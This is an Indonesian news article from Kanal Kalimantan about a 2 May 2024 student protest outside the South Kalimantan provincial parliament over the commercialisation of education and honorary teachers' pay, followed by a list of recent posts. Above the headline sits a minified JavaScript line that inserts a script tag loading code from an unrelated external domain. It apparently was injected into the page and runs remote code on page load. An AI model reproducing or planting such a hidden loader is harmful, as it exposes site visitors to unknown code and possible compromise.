(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Unjuk Rasa Mahasiswa di Rumah Banjar, Komersialisasi Dunia Pendidikan Jadi Sorotan


KANALKALIMANTAN.COM, BANJARMASIN – Sejumlah mahasiswa yang tergabung dalam Badan Eksekutif Mahasiswa (BEM) se Kalimantan Selatan berunjuk rasa di depan gedung Dewan Perwakilan Rakyat Daerah (DPRD) Provinsi Kalimantan Selatan (Kalsel), Kamis (2/5/2024) siang.

Aksi mahasiswa dari berbagai kampus itu dalam rangka memperingati Hari Buruh dan Hari Pendidikan Nasional tahun 2024.

Perwakilan mahasiswa yang berunjuk rasa berasal dari kampus Universitas Lambung Mangkurat (ULM), Universitas Islam Negeri Antasari (UIN) Banjarmasin, dan beberapa kampus di Banjarmasin lainnya. Bahkaan ada perwakilan mahasiswa dari STIA Amuntai dan mahasiswa dari Kotabaru.

Massa terlebih dahulu melakukan jalan kaki beberapa ratus meter menuju Rumah Banjar -sebutan kantor DPRD Kalsel- di Jalan Lambung Mangkurat Banjarmasin.

Baca juga: Silaturahmi Bersama Buruh-Kapolda, Serikat Pekerja Kalsel Tetap Menolak UU Citaker Hapus Outsourcing

Mereka membawa sejumlah sepanduk berbagai tulisan pro terhadap dunia pendidikan. Misalnya “Hapuskan Komersialisasi Pendidikan di Dunia Pendidikan” dan “Stop Komersialisasi Pendidikan”. Ada juga spanduk bertuliskan “Sejahterakan Guru Honorer Perhatikan KHL, #Tolak Upah Murah”.

Salah satu aspirasi yang disampaikan massa mahasiswa yaitu agar para guru honorer yang ada di Kalsel mendapatkan gaji yang layak dari negara. Disamping menyampaikan masalah pendidikan lainnya.

Massa diterima Anggota Komisi IV DPRD Provinsi Kalsel Lutfi Saifudin yang turun dari gedung DPRD untuk menemui mahasiswa yang berada di Jalan Lambung Mangkurat, Banjarmasin.

Anggota DPRD dari Fraksi Gerindra itu sempat menyampaikan di hadapan mahasiwa jika DPRD Kalsel selama ini telah bekerja memajukan pendidikan di Banua.

Baca juga: HMI Banjarmasin Komitmen Perjuangkan Kesejahteraan dan Hak Buruh

Satu Peraturan Daerah (Perda) Provinsi Kalsel yang menurutnya pro terhadap dunia pendidikan saat ini tengah digarap DPRD Kalsel dijanjikannya akan segera disahkan.

“Kita akan mengesahkan satu Perda memfasilitasi pendidikan tinggi tinggal uji publik. Kalau selama ini APBD Kalsel tidak bisa masuk membantu kawan-kawan mahasiswa, kita coba tembus dengan Perda ini,” kata Lutfi di hadapan para mahasiwa.

Aksi unjuk rasa mahasiswa di depan gedung DPRD Kalsel itu dijaga ketat oleh aparat kepolisian dari Polresta Banjarmasin.

Baca juga: Jembatan Pulau Telo Tertabrak Kapal Pembawa Crane, Pj Bupati Cek Kondisi

Dua buah mobil water cannon milik Polresta Banjarmasin juga disiagakan di Jalan Lambung Mangkurat.

Kapolresta Banjarmasin, Kombes Pol Sabana Atmojo memimpin langsung pengamanan demonstrasi. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

11 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

13 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

13 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

14 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

15 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

17 jam ago

This website uses cookies.